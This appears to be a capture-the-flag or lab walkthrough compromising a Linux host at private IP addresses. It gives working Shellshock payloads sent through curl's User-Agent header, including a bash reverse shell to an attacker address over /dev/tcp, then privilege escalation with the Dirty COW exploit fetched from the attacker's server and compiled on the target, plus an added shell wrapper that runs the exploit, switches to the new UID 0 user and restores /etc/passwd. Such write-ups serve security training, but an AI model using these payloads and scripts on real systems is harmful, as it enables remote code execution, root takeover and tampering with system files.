NETWORK
ENUMERATION
A nikto scan has revealed a CGI script, /cgi-bin/test/test.cgi, that is possibly vulnerable to Shellshock (CVE-2014-6271, the bash environment-variable function-parsing bug).
FOOTHOLD
Vulnerable to Shellshock
The web server copies request headers into the CGI script's environment (User-Agent becomes HTTP_USER_AGENT), so a header value that starts with a bash function definition and carries trailing commands gets executed by a vulnerable bash. The two echo statements emit a minimal CGI header block (Content-Type plus a blank line) so the server returns the command output instead of a 500 error. Running the following command
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://192.168.74.87/cgi-bin/test/test.cgi
returns the output of /usr/bin/id (uid and gid of the web server user) in the response body, which confirms that the target is vulnerable to Shellshock.
Using the same approach we can also open a reverse shell. Start a listener on port 1234 on the attacking machine (192.168.49.74) first; no CGI headers are needed in this payload, because the shell talks to our listener over /dev/tcp and the HTTP response itself is irrelevant (curl will simply hang while the shell is alive):
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.49.74/1234 0>&1' http://192.168.74.87/cgi-bin/test/test.cgi
PRIV ESCALATION
Dirty COW vulnerability
Running linux-exploit-suggester on the target shows the kernel is likely vulnerable to Dirty COW (CVE-2016-5195), a race condition in the kernel's copy-on-write handling that lets an unprivileged user write to read-only files such as /etc/passwd; the public exploit uses it to add a new UID 0 user to the system. Fetch the script from our web server and run it:
wget http://192.168.49.74/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
bash linux-exploit-suggester.sh | tee -a linux-exploit-suggester
More details and the exploit source are on Exploit-DB: https://www.exploit-db.com/exploits/40839 (dirty.c by FireFart). It backs up /etc/passwd to /tmp/passwd.bak, overwrites the root line with a new UID 0 user (firefart by default) whose password is given on the command line, and must be undone afterwards by moving the backup back into place. Because it races the kernel it is not guaranteed to succeed on the first run. Compiling on the target needs gcc and libcrypt; the PATH prefix in the compile line below does not change where gcc looks for headers (that would be CPATH), so the plain gcc -pthread invocation documented in the exploit header is sufficient. On the server, let's run
wget http://192.168.49.74/40839.c
PATH=/usr/include/linux:$PATH gcc -pthread 40839.c -o dirty -lcrypt
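A wrapper for the compiled exploit, as an added example that is neither part of the write-up nor the exploit author's code. It relies on the behaviour documented in the 40839 header (password as the first argument, backup to /tmp/passwd.bak, new user firefart with UID 0); the binary name ./dirty comes from the compile line above, and the default password, the extra backup path /tmp/passwd.mine and the passwd lines used in the test are assumptions constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example (not from the write-up or from exploit-db 40839 itself):
# run the compiled exploit, verify what it did to /etc/passwd, and restore.

# Return 0 if passwd file $1 contains user $2 with UID 0.
has_uid0_user() {
  local passwd_file="$1" user="$2"
  awk -F: -v u="$user" '$1 == u && $3 == 0 { found = 1 } END { exit found ? 0 : 1 }' "$passwd_file"
}

# Count UID 0 entries in passwd file $1 (a sane system has exactly one: root).
count_uid0() {
  awk -F: '$3 == 0 { n++ } END { print n + 0 }' "$1"
}

# Run the exploit and hand back a root shell. Must run on the target, in the
# directory holding ./dirty. The password is an assumed illustrative value.
dirtycow_root() {
  local password="${1:-Pwned123!}"
  cp /etc/passwd /tmp/passwd.mine   # our own backup, independent of the exploit's
  ./dirty "$password"               # 40839: writes the firefart line over root's
  if has_uid0_user /etc/passwd firefart; then
    echo "[+] firefart is UID 0 ($(count_uid0 /etc/passwd) UID 0 entries now)"
    su firefart                     # prompts for the password given above
  else
    echo "[-] /etc/passwd unchanged: kernel patched or race lost, try again"
    return 1
  fi
}

# Undo: put the original file back, from the exploit's copy or from ours.
dirtycow_restore() {
  if [ -f /tmp/passwd.bak ]; then
    mv /tmp/passwd.bak /etc/passwd
  elif [ -f /tmp/passwd.mine ]; then
    mv /tmp/passwd.mine /etc/passwd
  else
    echo "[-] no backup found" >&2
    return 1
  fi
}

# Usage on the target after compiling:
#   dirtycow_root 'Pwned123!'   # then, once done as root: dirtycow_restore
```

Because the exploit overwrites root's own line, root cannot be used by name until dirtycow_restore has run, so do the restore before leaving the box.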